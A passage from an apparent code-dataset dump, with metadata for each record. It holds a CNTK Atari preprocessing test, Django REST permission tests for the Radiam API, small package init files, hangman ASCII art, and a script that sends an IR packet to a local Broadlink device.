bindings/python/cntk/contrib/deeprl/tests/preprocessing_test.py
|
burhandodhy/CNTK
|
fcdeef63d0192c7b4b7428b14c1f9750d6c1de2e
|
[
"MIT"
] | 17,702
|
2016-01-25T14:03:01.000Z
|
2019-05-06T09:23:41.000Z
|
bindings/python/cntk/contrib/deeprl/tests/preprocessing_test.py
|
burhandodhy/CNTK
|
fcdeef63d0192c7b4b7428b14c1f9750d6c1de2e
|
[
"MIT"
] | 3,489
|
2016-01-25T13:32:09.000Z
|
2019-05-03T11:29:15.000Z
|
bindings/python/cntk/contrib/deeprl/tests/preprocessing_test.py
|
burhandodhy/CNTK
|
fcdeef63d0192c7b4b7428b14c1f9750d6c1de2e
|
[
"MIT"
] | 5,180
|
2016-01-25T14:02:12.000Z
|
2019-05-06T04:24:28.000Z
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import unittest
import numpy as np
from cntk.contrib.deeprl.agent.shared.preprocessing import AtariPreprocessing
class AtariPreprocessingTest(unittest.TestCase):
    """Unit tests for AtariPreprocessing."""
    def test_atari_preprocessing(self):
        """Exercise preprocess() and reset() against internal frame state.

        Uses name-mangled access (p._AtariPreprocessing__*) to inspect the
        preprocessor's private history buffer directly, so the assertion
        order mirrors the exact call sequence below.
        """
        # 210x160x3 raw frames, 4-frame history.
        p = AtariPreprocessing((210, 160, 3), 4)
        # Freshly constructed: zeroed raw image and a 4-deep history of
        # zeroed 84x84 processed frames.
        self.assertEqual(p._AtariPreprocessing__history_len, 4)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__previous_raw_image,
            np.zeros((210, 160, 3), dtype='uint8'))
        self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[0],
            np.zeros((84, 84), dtype='uint8'))
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[-1],
            np.zeros((84, 84), dtype='uint8'))
        # First frame of all-ones: stored as the previous raw image and
        # appended as the newest history entry; oldest entry stays zero.
        r = p.preprocess(np.ones((210, 160, 3), dtype=np.uint8))
        np.testing.assert_array_equal(
            p._AtariPreprocessing__previous_raw_image,
            np.ones((210, 160, 3), dtype=np.uint8))
        self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[0],
            np.zeros((84, 84), dtype='uint8'))
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[-1],
            np.ones((84, 84), dtype='uint8'))
        # Returned stack is (history, H, W) with the newest frame last.
        self.assertEqual(r.shape, (4, 84, 84))
        np.testing.assert_array_equal(
            np.squeeze(r[3, :, :]),
            np.ones((84, 84), dtype='uint8'))
        # Three more frames (values 2, 3, 4): the 4-deep buffer now holds
        # frames 1..4 in arrival order.
        p.preprocess(np.ones((210, 160, 3), dtype=np.uint8) * 2)
        p.preprocess(np.ones((210, 160, 3), dtype=np.uint8) * 3)
        r = p.preprocess(np.ones((210, 160, 3), dtype=np.uint8) * 4)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__previous_raw_image,
            np.ones((210, 160, 3), dtype='uint8') * 4)
        self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[0],
            np.ones((84, 84), dtype='uint8'))
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[1],
            np.ones((84, 84), dtype='uint8') * 2)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[2],
            np.ones((84, 84), dtype='uint8') * 3)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[3],
            np.ones((84, 84), dtype='uint8') * 4)
        self.assertEqual(r.shape, (4, 84, 84))
        np.testing.assert_array_equal(
            np.squeeze(r[3, :, :]),
            np.ones((84, 84), dtype='uint8') * 4)
        # reset() must restore the initial all-zero state.
        p.reset()
        np.testing.assert_array_equal(
            p._AtariPreprocessing__previous_raw_image,
            np.zeros((210, 160, 3), dtype='uint8'))
        self.assertEqual(len(p._AtariPreprocessing__processed_image_seq), 4)
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[0],
            np.zeros((84, 84), dtype='uint8'))
        np.testing.assert_array_equal(
            p._AtariPreprocessing__processed_image_seq[-1],
            np.zeros((84, 84), dtype='uint8'))
| 43.682927
| 80
| 0.620882
| 435
| 3,582
| 4.818391
| 0.165517
| 0.181298
| 0.114504
| 0.152672
| 0.808683
| 0.805821
| 0.79437
| 0.79437
| 0.782443
| 0.782443
| 0
| 0.060639
| 0.231156
| 3,582
| 81
| 81
| 44.222222
| 0.700436
| 0.073144
| 0
| 0.712121
| 0
| 0
| 0.022652
| 0
| 0
| 0
| 0
| 0
| 0.348485
| 1
| 0.015152
| false
| 0
| 0.045455
| 0
| 0.075758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1c8adaf9b47f8416ea31e6819d2f57e10149a7c
| 154
|
py
|
Python
|
src/api/controller/__init__.py
|
samborba/mediapipe-api
|
217584e052545a421c35bc2ab9e336b099442573
|
[
"Apache-2.0"
] | 12
|
2020-02-14T20:03:43.000Z
|
2022-01-10T02:07:24.000Z
|
src/api/controller/__init__.py
|
samborba/mediapipe-api
|
217584e052545a421c35bc2ab9e336b099442573
|
[
"Apache-2.0"
] | 2
|
2020-04-17T13:41:30.000Z
|
2020-12-16T01:17:26.000Z
|
src/api/controller/__init__.py
|
samborba/mediapipe-api
|
217584e052545a421c35bc2ab9e336b099442573
|
[
"Apache-2.0"
] | 3
|
2020-02-13T17:45:36.000Z
|
2021-05-26T23:55:33.000Z
|
from . import default_page
from . import hand_tracking
from . import multi_hand_tracking
from . import object_detection
from . import gesture_recognition
| 25.666667
| 33
| 0.837662
| 21
| 154
| 5.857143
| 0.52381
| 0.406504
| 0.260163
| 0.357724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12987
| 154
| 5
| 34
| 30.8
| 0.91791
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0617cc4fd8c24ef85695bc483c62d91b49779f31
| 14,941
|
py
|
Python
|
api/radiam/api/tests/permissionstests/datasetdatacollectionmethodpermissionstests.py
|
usask-rc/radiam
|
bfa38fd33e211b66e30e453a717c5f216e848cb2
|
[
"MIT"
] | 2
|
2020-02-01T20:41:28.000Z
|
2020-02-03T20:57:59.000Z
|
api/radiam/api/tests/permissionstests/datasetdatacollectionmethodpermissionstests.py
|
usask-rc/radiam
|
bfa38fd33e211b66e30e453a717c5f216e848cb2
|
[
"MIT"
] | 10
|
2020-04-20T15:52:49.000Z
|
2020-04-30T18:03:09.000Z
|
api/radiam/api/tests/permissionstests/datasetdatacollectionmethodpermissionstests.py
|
usask-rc/radiam
|
bfa38fd33e211b66e30e453a717c5f216e848cb2
|
[
"MIT"
] | null | null | null |
import json
from rest_framework.test import APITestCase
from rest_framework.test import APIRequestFactory
from rest_framework.test import force_authenticate
from django.urls import reverse
from radiam.api.models import (
User, Dataset, DataCollectionMethod, DatasetDataCollectionMethod
)
from radiam.api.views import DatasetDataCollectionMethodViewSet
class TestSuperuserDatasetDataCollectionMethodPermissions(APITestCase):
    """
    Test Response codes for DataCollectionMethod endpoints for Superuser roles.

    assertContains(..., text="") is used throughout purely to assert the
    response status code while forcing the response to render.
    """
    fixtures = ['userpermissions']
    def setUp(self):
        # All requests in this class run as the fixture superuser 'admin'.
        self.factory = APIRequestFactory()
        self.user = User.objects.get(username='admin')
    def test_superuser_read_datasetdatacollectionmethod_list(self):
        """
        Test Superuser can read DatasetDataCollectionMethod list (200)
        """
        request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_superuser_write_datasetdatacollectionmethod_list(self):
        """
        Test Superuser can write DatasetDataCollectionMethod list (201)
        """
        datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
        dataset = Dataset.objects.get(title='Research Is Fun')
        body = {
            'dataset': str(dataset.id),
            'data_collection_method': str(datacollectionmethod.id)
        }
        request = self.factory.post(
            reverse('datasetdatacollectionmethod-list'),
            json.dumps(body),
            content_type='application/json'
        )
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
        self.assertContains(response=response, text="", status_code=201)
    def test_superuser_read_datasetdatacollectionmethod_detail(self):
        """
        Test Superuser can read a DatasetDataCollectionMethod detail (200)
        """
        # Fixture id of an existing DatasetDataCollectionMethod row.
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        request = self.factory.get(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_superuser_write_datasetdatacollectionmethod_detail(self):
        """
        Test Superuser can write a DatasetDataCollectionMethod detail (200)
        """
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
        # NOTE(review): 'body' is built below but never passed to
        # factory.patch(), so this test sends an empty partial update.
        # TODO: confirm whether the payload should be sent like in the
        # POST test above.
        body = {
            "data_collection_method": reverse('datacollectionmethod-detail', kwargs={'pk': data_collection_method.id})
        }
        request = self.factory.patch(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
class TestAdminUserDatasetDataCollectionMethodPermissions(APITestCase):
    """
    Test Response codes for DataCollectionMethod endpoints for Admin User roles.

    assertContains(..., text="") is used throughout purely to assert the
    response status code while forcing the response to render.
    """
    fixtures = ['userpermissions']
    def setUp(self):
        # All requests in this class run as fixture user 'testuser1'
        # (a group/project admin, per the userpermissions fixture).
        self.factory = APIRequestFactory()
        self.user = User.objects.get(username='testuser1')
    def test_admin_user_read_datasetdatacollectionmethod_list(self):
        """
        Test Admin User can read DatasetDataCollectionMethod list (200)
        """
        request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_admin_user_write_datasetdatacollectionmethod_list(self):
        """
        Test Admin User can write DatasetDataCollectionMethod list (201)
        """
        # NOTE(review): docstring previously said "Member user cannot
        # write", but the assertion expects 201 (create succeeds) for the
        # admin user, so it has been corrected.
        datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
        dataset = Dataset.objects.get(title='Research Is Fun')
        body = {
            'dataset': str(dataset.id),
            'data_collection_method': str(datacollectionmethod.id)
        }
        request = self.factory.post(
            reverse('datasetdatacollectionmethod-list'),
            json.dumps(body),
            content_type='application/json'
        )
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
        self.assertContains(
            response=response,
            text="",
            status_code=201)
    def test_adminuser_read_datasetdatacollectionmethod_detail(self):
        """
        Test Admin user can read a DatasetDataCollectionMethod detail (200)
        """
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        request = self.factory.get(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_admin_user_write_datasetdatacollectionmethod_detail(self):
        """
        Test Admin User can write a DatasetDataCollectionMethod detail (200)
        """
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
        # NOTE(review): 'body' is built below but never passed to
        # factory.patch(), so this test sends an empty partial update.
        # TODO: confirm whether the payload should be sent.
        body = {
            "data_collection_method": reverse('datacollectionmethod-detail', kwargs={'pk': data_collection_method.id})
        }
        request = self.factory.patch(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
class TestManagerUserDatasetDataCollectionMethodPermissions(APITestCase):
    """
    Test Response codes for DataCollectionMethod endpoints for Manager User roles.

    assertContains(..., text="") is used throughout purely to assert the
    response status code while forcing the response to render.
    """
    fixtures = ['userpermissions']
    def setUp(self):
        # All requests in this class run as fixture user 'testuser2'
        # (a manager, per the userpermissions fixture).
        self.factory = APIRequestFactory()
        self.user = User.objects.get(username='testuser2')
    def test_manager_user_read_datasetdatacollectionmethod_list(self):
        """
        Test Manager User can read DatasetDataCollectionMethod list (200)
        """
        request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_manager_user_write_datasetdatacollectionmethod_list(self):
        """
        Test Manager user cannot write DatasetDataCollectionMethod list (403)
        """
        # NOTE(review): docstring previously said "Member user" -- this
        # class exercises the manager role; corrected to match.
        datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
        dataset = Dataset.objects.get(title='Research Is Fun')
        body = {
            'dataset': str(dataset.id),
            'data_collection_method': reverse('datacollectionmethod-detail', kwargs={'pk': datacollectionmethod.id})
        }
        request = self.factory.post(
            reverse('datasetdatacollectionmethod-list'),
            json.dumps(body),
            content_type='application/json'
        )
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
        self.assertContains(
            response=response,
            text="",
            status_code=403)
    def test_manager_user_read_datasetdatacollectionmethod_detail(self):
        """
        Test Manager user can read a DatasetDataCollectionMethod detail (200)
        """
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        request = self.factory.get(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_manager_user_write_datasetdatacollectionmethod_detail(self):
        """
        Test Manager User cannot write a DatasetDataCollectionMethod detail (403)
        """
        # NOTE(review): docstring previously said "can write", but the
        # assertion expects 403 (forbidden); corrected to match.
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
        # NOTE(review): 'body' is built below but never passed to
        # factory.patch(); the permission check rejects the request before
        # any payload would matter, but confirm the intent.
        body = {
            "data_collection_method": str(data_collection_method.id)
        }
        request = self.factory.patch(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=403)
class TestMemberUserDatasetDataCollectionMethodPermissions(APITestCase):
    """
    Test Response codes for DataCollectionMethod endpoints for Member User roles.

    assertContains(..., text="") is used throughout purely to assert the
    response status code while forcing the response to render.
    """
    fixtures = ['userpermissions']
    def setUp(self):
        # All requests in this class run as fixture user 'testuser3'
        # (an ordinary member, per the userpermissions fixture).
        self.factory = APIRequestFactory()
        self.user = User.objects.get(username='testuser3')
    def test_member_user_read_datasetdatacollectionmethod_list(self):
        """
        Test Member User can read DatasetDataCollectionMethod list (200)
        """
        request = self.factory.get(reverse('datasetdatacollectionmethod-list'))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'list'})(request)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_member_user_write_datasetdatacollectionmethod_list(self):
        """
        Test Member user cannot write DatasetDataCollectionMethod list (403)
        """
        datacollectionmethod = DataCollectionMethod.objects.get(label='datacollection.method.other')
        dataset = Dataset.objects.get(title='Research Is Fun')
        body = {
            'dataset': str(dataset.id),
            'data_collection_method': str(datacollectionmethod.id)
        }
        request = self.factory.post(
            reverse('datasetdatacollectionmethod-list'),
            json.dumps(body),
            content_type='application/json'
        )
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'post': 'create'})(request)
        self.assertContains(
            response=response,
            text="",
            status_code=403)
    def test_member_user_read_datasetdatacollectionmethod_detail(self):
        """
        Test Member user can read a DatasetDataCollectionMethod detail (200)
        """
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        request = self.factory.get(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'get': 'retrieve'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=200)
    def test_member_user_write_datasetdatacollectionmethod_detail(self):
        """
        Test Member User cannot write a DatasetDataCollectionMethod detail (403)
        """
        # NOTE(review): docstring previously said "can write", but the
        # assertion expects 403 (forbidden); corrected to match.
        detail_datasetdatacollectionmethod = \
            DatasetDataCollectionMethod.objects.get(id='f9d1402a-2301-4bf8-b4cd-70590e3ca4b7')
        data_collection_method = DataCollectionMethod.objects.get(label='datacollection.method.other')
        # NOTE(review): 'body' is built below but never passed to
        # factory.patch(); the permission check rejects the request before
        # any payload would matter, but confirm the intent.
        body = {
            "data_collection_method": str(data_collection_method.id)
        }
        request = self.factory.patch(
            reverse('datasetdatacollectionmethod-detail',
                    args=[detail_datasetdatacollectionmethod.id]))
        request.user = self.user
        force_authenticate(request, user=request.user)
        response = DatasetDataCollectionMethodViewSet.as_view({'patch': 'partial_update'})(request, pk=detail_datasetdatacollectionmethod.id)
        self.assertContains(
            response=response,
            text="",
            status_code=403)
| 36.089372
| 141
| 0.668496
| 1,283
| 14,941
| 7.636009
| 0.075604
| 0.053894
| 0.029397
| 0.03103
| 0.946923
| 0.934878
| 0.898132
| 0.877616
| 0.847708
| 0.847708
| 0
| 0.018563
| 0.239208
| 14,941
| 413
| 142
| 36.176755
| 0.843318
| 0.08634
| 0
| 0.813953
| 0
| 0
| 0.130616
| 0.097489
| 0
| 0
| 0
| 0
| 0.062016
| 1
| 0.077519
| false
| 0
| 0.027132
| 0
| 0.135659
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae102d0b97806b39c67128b778f1e237fd39f6a8
| 79
|
py
|
Python
|
eno/__init__.py
|
endaga/eno-python
|
eb336fdcdf4b78c2c84c680e62ec74679396e7b3
|
[
"MIT"
] | 1
|
2018-08-17T07:30:19.000Z
|
2018-08-17T07:30:19.000Z
|
eno/__init__.py
|
endaga/eno-python
|
eb336fdcdf4b78c2c84c680e62ec74679396e7b3
|
[
"MIT"
] | null | null | null |
eno/__init__.py
|
endaga/eno-python
|
eb336fdcdf4b78c2c84c680e62ec74679396e7b3
|
[
"MIT"
] | null | null | null |
"""The eno core."""
from eno.nodes import get_node
from eno.nodes import Node
| 15.8
| 30
| 0.734177
| 14
| 79
| 4.071429
| 0.571429
| 0.245614
| 0.421053
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151899
| 79
| 4
| 31
| 19.75
| 0.850746
| 0.164557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ae7fc0c645ddb52e75edcd770288590401a23015
| 709
|
py
|
Python
|
hangman_life.py
|
MohammadHAbbaspour/Hang-Man-Game
|
314b4e8d1b75188deb6f066dc937e95029a1e388
|
[
"MIT"
] | null | null | null |
hangman_life.py
|
MohammadHAbbaspour/Hang-Man-Game
|
314b4e8d1b75188deb6f066dc937e95029a1e388
|
[
"MIT"
] | null | null | null |
hangman_life.py
|
MohammadHAbbaspour/Hang-Man-Game
|
314b4e8d1b75188deb6f066dc937e95029a1e388
|
[
"MIT"
] | null | null | null |
# ASCII-art hangman stages, drawn with triple-quoted strings. The first
# entry shows the complete figure (game over) and the last shows the empty
# gallows; presumably the list is indexed by lives remaining -- TODO confirm
# against the game loop that consumes it. The internal whitespace of each
# string is significant (it is printed verbatim).
lives = ['''
________
| \|
O |
/|\ |
/ \ |
|
=========
''' , '''
________
| \|
O |
/|\ |
\ |
|
=========
''' , '''
________
| \|
O |
/|\ |
|
|
=========
''','''
________
| \|
O |
|\ |
|
|
=========
''','''
________
| \|
O |
| |
|
|
=========
''','''
________
| \|
O |
|
|
=========
''','''
________
| \|
|
|
|
|
=========
''']
| 12.660714
| 13
| 0.094499
| 7
| 709
| 1.571429
| 0.285714
| 0.909091
| 1.090909
| 1.090909
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.655853
| 709
| 56
| 14
| 12.660714
| 0.045082
| 0
| 0
| 0.660714
| 0
| 0
| 0.903817
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
881c6f85ce81da70cbc73822de20d22282848547
| 168
|
py
|
Python
|
lib/__init__.py
|
plemeri/UACANet
|
fdfca0d26e0c7d25e92676d451dc613af5e83f3c
|
[
"MIT"
] | 57
|
2021-07-07T06:13:03.000Z
|
2022-03-29T10:20:30.000Z
|
lib/__init__.py
|
POSTECH-IMLAB/UACANet
|
1b22572dc1e2b42f27ed06be51b6604bdff7471b
|
[
"MIT"
] | 9
|
2021-07-17T10:46:52.000Z
|
2022-03-10T15:00:57.000Z
|
lib/__init__.py
|
plemeri/UACANet
|
fdfca0d26e0c7d25e92676d451dc613af5e83f3c
|
[
"MIT"
] | 17
|
2021-07-08T04:52:19.000Z
|
2022-03-19T13:33:48.000Z
|
from lib.PraNet import PraNet
from lib.Baseline import Baseline
from lib.CANet import CANet
from lib.UACANet import UACANet
from lib.UACANet_SwinB import UACANet_SwinB
| 28
| 43
| 0.85119
| 27
| 168
| 5.222222
| 0.296296
| 0.248227
| 0.198582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 168
| 5
| 44
| 33.6
| 0.952703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
882a6adfddaf407695f900bdcb549ffb21ccb08e
| 482
|
py
|
Python
|
scripts/send_packet.py
|
Darzou/broadlink-api
|
5d265a5b1a990d445e09b26067bc3c32cdb8743c
|
[
"Apache-2.0"
] | 1
|
2021-08-05T13:04:14.000Z
|
2021-08-05T13:04:14.000Z
|
scripts/send_packet.py
|
Darzou/broadlink-api
|
5d265a5b1a990d445e09b26067bc3c32cdb8743c
|
[
"Apache-2.0"
] | null | null | null |
scripts/send_packet.py
|
Darzou/broadlink-api
|
5d265a5b1a990d445e09b26067bc3c32cdb8743c
|
[
"Apache-2.0"
] | null | null | null |
import broadlink
import binascii

# Raw Broadlink IR/RF packet, hex-encoded (as produced by the device's
# learn mode). It is decoded with binascii.unhexlify before sending.
packet = b'2600920000012490183418101710183417341810181017101810171018101710181017101810171018101710181017101810173517341810171018101710181017341810173517101810173418101700028d1810171018101710181017101810171018341711171018101710181017101810171018101710181017101810171018101710181017101810173517341810171018000d05'
print(packet)

# discover() scans the LAN and returns a (possibly empty) list of devices.
# Guard against an empty result so the script fails with a clear message
# instead of a bare IndexError on devices[0].
devices = broadlink.discover(timeout=5)
if not devices:
    raise RuntimeError('No Broadlink devices found on the network')
device = devices[0]
device.auth()
device.send_data(binascii.unhexlify(packet))
| 40.166667
| 312
| 0.914938
| 25
| 482
| 17.6
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.647948
| 0.039419
| 482
| 11
| 313
| 43.818182
| 0.302376
| 0
| 0
| 0
| 0
| 0
| 0.622407
| 0.622407
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.125
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88acb8f1119fca4ee7587c85d71b4e303b28f01a
| 219
|
py
|
Python
|
populous/messaging/__init__.py
|
caiges/populous
|
d07094f9d6b2528d282ed99af0063002480bc00b
|
[
"BSD-3-Clause"
] | 2
|
2016-05-09T01:17:08.000Z
|
2017-07-18T23:35:01.000Z
|
populous/messaging/__init__.py
|
caiges/populous
|
d07094f9d6b2528d282ed99af0063002480bc00b
|
[
"BSD-3-Clause"
] | null | null | null |
populous/messaging/__init__.py
|
caiges/populous
|
d07094f9d6b2528d282ed99af0063002480bc00b
|
[
"BSD-3-Clause"
] | null | null | null |
#from populous.messaging.protocols.im import IMMessage, IMConnection
from populous.messaging.protocols.sms import SMSMessage
from django.core.mail import EmailMessage
# Convenient alias
#im_connection = IMConnection()
| 31.285714
| 68
| 0.840183
| 26
| 219
| 7.038462
| 0.653846
| 0.131148
| 0.229508
| 0.327869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091324
| 219
| 6
| 69
| 36.5
| 0.919598
| 0.520548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ee2ff9ae8448f155f49d044c373401a26e5d9b21
| 171
|
py
|
Python
|
project/dashboard/routes.py
|
panuta/fund-dashboard
|
1d24489869cb2099073ed5f19a577f0913599524
|
[
"MIT"
] | null | null | null |
project/dashboard/routes.py
|
panuta/fund-dashboard
|
1d24489869cb2099073ed5f19a577f0913599524
|
[
"MIT"
] | null | null | null |
project/dashboard/routes.py
|
